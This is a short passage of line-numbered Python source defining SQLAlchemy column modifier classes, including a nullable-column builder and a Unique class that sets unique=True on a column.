self.type = type 214 | self.args, self.kwargs = args, kwargs 215 | 216 | def build(self, name): 217 | return sa.Column(name, self.type, nullable=True, *self.args, **self.kwargs) 218 | 219 | 220 | class Unique(Modifier): 221 | def __init__(self, type, *args, **kwargs): 222 | self.type = type 223 | self.args, self.kwargs = args, kwargs 224 | 225 | def build(self, name): 226 | return sa.Column(name, self.type, unique=True, *self.args, **self.kwargs) --------------------------------------------------------------------------------